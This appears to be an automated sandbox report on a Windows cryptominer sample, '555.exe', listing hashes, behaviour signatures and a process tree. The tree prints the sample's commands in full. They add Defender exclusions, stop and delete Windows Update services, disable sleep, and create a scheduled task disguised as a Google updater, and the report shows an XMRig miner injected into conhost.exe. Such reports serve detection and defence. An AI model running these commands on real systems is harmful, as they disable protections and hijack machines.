Analysis
-
max time kernel
300s -
max time network
279s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03-10-2022 04:07
Behavioral task
behavioral1
Sample
555.exe
Resource
win7-20220812-en
General
-
Target
555.exe
-
Size
7.1MB
-
MD5
1811298c479bc582f551f733c4c11f7d
-
SHA1
78d2b2c8f2a7c4cd4019cbdf356cafa928cadc9f
-
SHA256
305fb7b5adde837bdadd1cae12c836afd054ce08d92cc45e4d31849c85cd7e77
-
SHA512
986f7cfe4f82ce8a8225e44c2fe7c1f9c23dd6536d28b16cc882c5eec2757b3bca0a12892b7e834b9d27757cd41d69aef42696a8ea3eb21dc4ff53a2b60d842f
-
SSDEEP
196608:iqFm0FXrzx4rtPVbFxPXQha2j+VE7fVhoKqeGb5K/5zU:iairpp7CanVE7T9TEE5zU
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
555.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 555.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1560-166-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1560-168-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
555.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts 555.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1572 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1560-166-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1560-168-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
555.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 555.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 555.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1972 taskeng.exe -
Processes:
resource yara_rule behavioral1/memory/1644-54-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-55-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-57-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-58-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-60-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-61-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-67-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida behavioral1/memory/1644-101-0x000000013F4C0000-0x00000001401C0000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1572-115-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-118-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-117-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-116-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-120-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-119-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-122-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-127-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida behavioral1/memory/1572-164-0x000000013F1F0000-0x000000013FEF0000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
555.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 555.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
555.exeupdater.exepid process 1644 555.exe 1572 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1572 set thread context of 1496 1572 updater.exe conhost.exe PID 1572 set thread context of 1560 1572 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
555.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe 555.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 780 sc.exe 808 sc.exe 608 sc.exe 1532 sc.exe 1540 sc.exe 1252 sc.exe 1268 sc.exe 1352 sc.exe 876 sc.exe 1924 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1272 schtasks.exe 1164 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90828293eed6d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 748 powershell.exe 900 powershell.exe 1720 powershell.exe 1500 powershell.exe 780 powershell.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe 1560 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 748 powershell.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeShutdownPrivilege 1000 powercfg.exe Token: SeShutdownPrivilege 1868 powercfg.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeShutdownPrivilege 1780 powercfg.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 780 powershell.exe Token: SeShutdownPrivilege 2000 powercfg.exe Token: SeShutdownPrivilege 588 powercfg.exe Token: SeShutdownPrivilege 1272 powercfg.exe Token: SeShutdownPrivilege 1504 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1044 WMIC.exe Token: SeIncreaseQuotaPrivilege 1044 WMIC.exe Token: SeSecurityPrivilege 1044 WMIC.exe Token: SeTakeOwnershipPrivilege 1044 WMIC.exe Token: SeLoadDriverPrivilege 1044 WMIC.exe Token: SeSystemtimePrivilege 1044 WMIC.exe Token: SeBackupPrivilege 1044 WMIC.exe Token: SeRestorePrivilege 1044 WMIC.exe Token: SeShutdownPrivilege 1044 WMIC.exe Token: SeSystemEnvironmentPrivilege 1044 WMIC.exe Token: SeUndockPrivilege 1044 WMIC.exe Token: SeManageVolumePrivilege 1044 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1044 WMIC.exe Token: SeIncreaseQuotaPrivilege 1044 WMIC.exe Token: SeSecurityPrivilege 1044 WMIC.exe Token: SeTakeOwnershipPrivilege 1044 WMIC.exe Token: SeLoadDriverPrivilege 1044 WMIC.exe Token: SeSystemtimePrivilege 1044 WMIC.exe Token: SeBackupPrivilege 1044 WMIC.exe Token: SeRestorePrivilege 1044 WMIC.exe Token: SeShutdownPrivilege 1044 WMIC.exe Token: SeSystemEnvironmentPrivilege 1044 WMIC.exe Token: SeUndockPrivilege 1044 WMIC.exe Token: SeManageVolumePrivilege 1044 WMIC.exe Token: SeLockMemoryPrivilege 1560 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
555.execmd.execmd.exepowershell.exepowershell.exetaskeng.exedescription pid process target process PID 1644 wrote to memory of 748 1644 555.exe powershell.exe PID 1644 wrote to memory of 748 1644 555.exe powershell.exe PID 1644 wrote to memory of 748 1644 555.exe powershell.exe PID 1644 wrote to memory of 1412 1644 555.exe cmd.exe PID 1644 wrote to memory of 1412 1644 555.exe cmd.exe PID 1644 wrote to memory of 1412 1644 555.exe cmd.exe PID 1644 wrote to memory of 1240 1644 555.exe cmd.exe PID 1644 wrote to memory of 1240 1644 555.exe cmd.exe PID 1644 wrote to memory of 1240 1644 555.exe cmd.exe PID 1644 wrote to memory of 900 1644 555.exe powershell.exe PID 1644 wrote to memory of 900 1644 555.exe powershell.exe PID 1644 wrote to memory of 900 1644 555.exe powershell.exe PID 1412 wrote to memory of 1924 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1924 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1924 1412 cmd.exe sc.exe PID 1240 wrote to memory of 1816 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1816 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1816 1240 cmd.exe powercfg.exe PID 1412 wrote to memory of 1352 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1352 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1352 1412 cmd.exe sc.exe PID 1412 wrote to memory of 876 1412 cmd.exe sc.exe PID 1412 wrote to memory of 876 1412 cmd.exe sc.exe PID 1412 wrote to memory of 876 1412 cmd.exe sc.exe PID 1240 wrote to memory of 1000 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1000 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1000 1240 cmd.exe powercfg.exe PID 1412 wrote to memory of 1268 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1268 1412 cmd.exe sc.exe PID 1412 wrote to memory of 1268 1412 cmd.exe sc.exe PID 1240 wrote to memory of 1868 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1868 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1868 1240 cmd.exe powercfg.exe PID 1412 wrote to memory of 780 1412 cmd.exe sc.exe PID 1412 wrote to memory of 780 1412 cmd.exe sc.exe PID 1412 wrote to memory of 780 1412 cmd.exe sc.exe PID 1240 wrote to memory of 1780 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1780 1240 cmd.exe powercfg.exe PID 1240 wrote to memory of 1780 1240 cmd.exe powercfg.exe PID 1412 wrote to memory of 1164 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1164 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1164 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1952 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1952 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1952 1412 cmd.exe reg.exe PID 1412 wrote to memory of 668 1412 cmd.exe reg.exe PID 1412 wrote to memory of 668 1412 cmd.exe reg.exe PID 1412 wrote to memory of 668 1412 cmd.exe reg.exe PID 1412 wrote to memory of 552 1412 cmd.exe reg.exe PID 1412 wrote to memory of 552 1412 cmd.exe reg.exe PID 1412 wrote to memory of 552 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1092 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1092 1412 cmd.exe reg.exe PID 1412 wrote to memory of 1092 1412 cmd.exe reg.exe PID 900 wrote to memory of 1272 900 powershell.exe schtasks.exe PID 900 wrote to memory of 1272 900 powershell.exe schtasks.exe PID 900 wrote to memory of 1272 900 powershell.exe schtasks.exe PID 1644 wrote to memory of 1720 1644 555.exe powershell.exe PID 1644 wrote to memory of 1720 1644 555.exe powershell.exe PID 1644 wrote to memory of 1720 1644 555.exe powershell.exe PID 1720 wrote to memory of 1212 1720 powershell.exe schtasks.exe PID 1720 wrote to memory of 1212 1720 powershell.exe schtasks.exe PID 1720 wrote to memory of 1212 1720 powershell.exe schtasks.exe PID 1972 wrote to memory of 1572 1972 taskeng.exe updater.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\555.exe"C:\Users\Admin\AppData\Local\Temp\555.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#vxyhz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {DF46C45B-DD75-4B3B-BEDF-73247C04F227} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#eaoqkxx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe wygzabxfbktab3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe yluxxonfmsqtfwpr GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1htkUt/8aAdr6yQCo+wN61IVXg3oZHUHUUBFwXWKf1by3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD5b47a5db99257e5746288f2e91f5d856f
SHA151117d33f41ffcf408f97eba2bcfcb861081e6bb
SHA25650912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f
SHA512ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD5b47a5db99257e5746288f2e91f5d856f
SHA151117d33f41ffcf408f97eba2bcfcb861081e6bb
SHA25650912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f
SHA512ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD55d15db2ca80bf169e500adbfa8e011ec
SHA1dc3bd28742586addd01da3d039cbdb4f0b6ab945
SHA2562e865fc125cb406529160be91731d155b048b4290b1c8adef669055c8ad7dcb3
SHA5126c05855a6ab7adcf0a112961c8752a0855826f0a51306c39488b61b7abb3d4a02fe5f8eb3aff92b473e25588b9519feb4ca39d650b8b80501d81d5b92927cdf7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD55d15db2ca80bf169e500adbfa8e011ec
SHA1dc3bd28742586addd01da3d039cbdb4f0b6ab945
SHA2562e865fc125cb406529160be91731d155b048b4290b1c8adef669055c8ad7dcb3
SHA5126c05855a6ab7adcf0a112961c8752a0855826f0a51306c39488b61b7abb3d4a02fe5f8eb3aff92b473e25588b9519feb4ca39d650b8b80501d81d5b92927cdf7
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD56a6e7bd3ab61bc3a866ab5622a6d12de
SHA1addf3a82f404566f7cd93672914f95b32948008d
SHA256a34cba80c33c23675da843eb77d1aac68375b30528614be5a1b9c1a8887118e5
SHA512f7186785e1901feffd6972bed7451d534310f58b6638008627eae9b24a7772f1115f90c227d3ae168701d989580df001c8dec4c2c87d738e6500247afa42d6f9
-
\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD5b47a5db99257e5746288f2e91f5d856f
SHA151117d33f41ffcf408f97eba2bcfcb861081e6bb
SHA25650912cba2af4b843a1787258bb1d5bd33186458215689c3dfe42e71cfb60044f
SHA512ba1d1175573e4bac3d355c6532f0ab1effb3f8b907935e460bc1a435d20ee547284093031c03edc4650fdcc67d6db00a940810d4fd6485b5e150d6e8ea354148
-
memory/552-93-0x0000000000000000-mapping.dmp
-
memory/588-144-0x0000000000000000-mapping.dmp
-
memory/608-146-0x0000000000000000-mapping.dmp
-
memory/668-92-0x0000000000000000-mapping.dmp
-
memory/748-66-0x000000001B720000-0x000000001BA1F000-memory.dmpFilesize
3.0MB
-
memory/748-152-0x0000000000000000-mapping.dmp
-
memory/748-65-0x000007FEF3C60000-0x000007FEF47BD000-memory.dmpFilesize
11.4MB
-
memory/748-69-0x00000000029C4000-0x00000000029C7000-memory.dmpFilesize
12KB
-
memory/748-70-0x00000000029CB000-0x00000000029EA000-memory.dmpFilesize
124KB
-
memory/748-71-0x00000000029CB000-0x00000000029EA000-memory.dmpFilesize
124KB
-
memory/748-63-0x000007FEFB881000-0x000007FEFB883000-memory.dmpFilesize
8KB
-
memory/748-62-0x0000000000000000-mapping.dmp
-
